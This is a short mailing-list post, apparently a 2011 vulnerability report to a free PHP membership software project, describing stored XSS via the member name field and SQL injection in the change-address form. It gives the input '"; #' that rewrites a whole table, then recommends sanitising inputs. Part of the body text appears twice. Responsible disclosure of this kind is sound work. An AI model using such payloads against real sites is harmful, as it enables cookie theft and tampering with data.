Susceptible to XSS attacks and SQL injection attacks
1 view
Skip to first unread message
Nicholas Tsoi-A-Sue
May 24, 2011, 11:52:20 PM5/24/11
to Free Simple Software
The website is susceptible to XSS attacks. An attack can register as a
new member and input javascript as his name. Whenever the attacker's
name is printed, the javascript will be executed on that user's
machine. This malicious script can steal the user's cookies allowing
an attacker to impersonate another user.
It is also susceptible to SQL injection attacks. In the change member
address form, a user can fill in garbage data and for the last field
in the form, fill in "; #". This will comment out the SQL query that
specifies which row to update, and the entire member address table
will be updated..
To prevent these attacks you should sanitize your inputs. There are
many PHP commands thats you can use.
Thanks.
new member and input javascript as his name. Whenever the attacker's
name is printed, the javascript will be executed on that user's
machine. This malicious script can steal the user's cookies allowing
an attacker to impersonate another user.
It is also susceptible to SQL injection attacks. In the change member
address form, a user can fill in garbage data and for the last field
in the form, fill in "; #". This will comment out the SQL query that
specifies which row to update, and the entire member address table
will be updated..
To prevent these attacks you should sanitize your inputs. There are
many PHP commands thats you can use.
Thanks.
Reply all
Reply to author
Forward
0 new messages